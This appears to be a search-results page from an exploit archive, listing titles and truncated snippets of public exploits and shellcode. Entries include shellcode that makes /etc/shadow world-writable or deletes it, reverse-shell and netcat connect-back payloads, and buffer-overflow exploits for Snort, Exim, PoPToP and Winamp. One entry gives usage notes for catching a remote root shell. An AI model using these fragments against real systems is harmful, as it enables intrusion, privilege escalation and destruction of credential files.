7260 matches found
Linux - setuid(0) & execve("/sbin/poweroff -f")
No description provided by source. include stdio.h / linux/x86 ; setuid0 & execve/sbin/poweroff -f 47 bytes written by ka0x - ka0x01alt+64gmail.com lun sep 21 16:40:16 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others! / int main char shellcode...
PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl PEiD = 0.92 Buffer Overflow Universal Exploit Exploit by SkD [email protected] ---------------------------------------------- An old vulnerability but no existing exploit for it, so here it is. Of course, I had to make it universal because of...
Linux - chmod(/etc/shadow, 0666) & exit() - 33 bytes
No description provided by source. include stdio.h / linux/x86 ; chmod/etc/shadow, 0666 & exit 33 bytes written by ka0x - ka0x01alt+64gmail.com lun sep 21 17:13:25 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others! / int main char shellcode = \x31\xc0 /...
Exim <= 4.41 dns_build_reverse Local Exploit PoC
No description provided by source. / This proof-of-concept demonstrates the existence of the vulnerability reported by iDEFENSE iDEFENSE Security Advisory 01.14.05. It has been tested against exim-4.41 under Debian GNU/Linux. Note that setuid is not included in the shellcode to avoid...
HP-UX 9.x/10.x/11.x cu Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1886/info cu is a unix utility that is used for communication between two hosts usually over phone lines. It is typically isntalled setuid root so that it can access communications hardware when executed by a regular user...
BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP
No description provided by source. Exploit-DB Note: XPSP3 - my $eip = pack'V',0x7c868667; jmp ESP on kernel32.dll Date: Tue Apr 8 2014 Vendor link: http://www.blazevideo.com/download.htmm Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro App Version: 6.1 Tested on: Windows...
MIPS Little Endian Reverse Shell Shellcode (Linux)
No description provided by source. MIPS Little Endian Reverse Shell ASM File and Assembled Shellcode Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators Blog: http://infosec42.blogspot.com Company Website: http://securityevaluators.com .data .bss .text .globl start start:...
Aesop GIF Creator <= 2.1 - (.aep) Buffer Overflow Exploit
No description provided by source. !/usr/bin/python Exploit Title: Aesop GIF Creator = v2.1 .aep Buffer Overflow Exploit Date: 12/15/2010 Author: xsploitedsec URL: http://www.x-sploited.com/ Contact: xsploitedsec at x-sploited.com Software Link: http://www.yukudr.com/h84561/aesopsetup.exe...
Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)
No description provided by source. / rmtheshadow.c by mrme Just for fun : visit: http://www.corelan.be:8800/ / include stdio.h include string.h char sc = x31xc0 // xor %eax,%eax xb0x46 // mov $046,%al x31xdb // xor %ebx,%ebx x31xc9 // xor %ecx,%ecx xcdx80 // int $080 x31xc0 // xor %eax,%eax x50 /...
Winamp 5.572 - whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De
No description provided by source. Tested on: WinXP SP3 De !/usr/bin/perl Still learning, having some fun... Greetz to -Sid- Roadkill Jess Dawn Linki Special greetz do Debug, even i dont know you. Nice find man. Exploit has something around 70% chance of success. print \n\n; print Winamp 5.572...
Snort <= 1.9.1 - Remote Root Exploit (p7snort191.sh)
No description provided by source. !/bin/sh p7snort191.sh by truff [email protected] Snort 1.9.1 and below remote exploit Tested on Slackware 8.0 with Snort 1.9.1 from sources Usage: 1/ Launch a listening netcat to listen for the shell nc -p 45295 -l 2/ p7snort119.sh yourIP RetAddr Where yourIP i...
PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c)
No description provided by source. / Fixed Exploit against PoPToP in Linux poptop-sane.c ./r4nc0rwh0r3 of blightninjas [email protected] blightninjas: bringing pain, suffering, and humiliation to the security world Expect more great release like helloworld-annotated.c and cd explained...
XnView 1.92.1 - Command-Line Arguments Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28259/info XnView is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers may exploit this issue only i...
Linux x86 netcat connect back port 8080 - 76 bytes
No description provided by source. / 08048060 start: 8048060: eb 2a jmp 804808c GotoCall 08048062 shellcode: 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 15 mov %al,0x15%esi 804806b: 88 46 1a mov %al,0x1a%esi 804806e: 89 76 1b mov %esi,0x1b%es...
MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (5)
No description provided by source. source: http://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based...
Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes
No description provided by source. include stdio.h include string.h / Aodrulez's /bin/sh Null-Free Polymorphic Shellcode. Shellcode size : 46 bytes. Special Tnx to 'Chema Garcia aka sch3m4' Tested on : Ubuntu 8.04,Hardy Heron. Email : f3arm3d3aratgmail.com Author: Aodrulez. Atul Alex Cherian Blog...
Altarsoft Audio Converter 1.1 - Buffer Overflow Exploit (SEH)
No description provided by source. Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1SEH Date: 16/12/2010 Author: C4SS!0 G0M3S Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe Version: 111 Tested on: WIN-XP SP3 PT-BR CVE: N/A Created By C4SS!0 G0M3S...
Windows XP Pro Sp2 English "Message-Box" Shellcode
No description provided by source. +-----------------------------------------------------+ | Windows XP Pro Sp2 English Message-Box Shellcode. | +-----------------------------------------------------+ Size : 16 Bytes, Null-Free. Author : Aodrulez. Email : [email protected] Shellcode =...
Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit
No description provided by source. / fm-iSink.c overflow in mRouter, suid binary used by iSync, on OSX = 10.3.7 written by - nemo @ felinemenace.org - ,'| .-''-.....--'; / '. ..-' , ,--...--''' \ .--''' /' -';' ; ; ; ...--'' ...--..' .;.' fL ,....----''' ,..--'' http://pulltheplug.org and...
Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit
No description provided by source. / Mercury imap4 server remote buffer overflow exploit author : c0d3r kaveh razavi [email protected] [email protected] package : Mercury mail transport system 4.01a and prolly prior workaround : upgrade to 4.01b version advisory : not available right now company...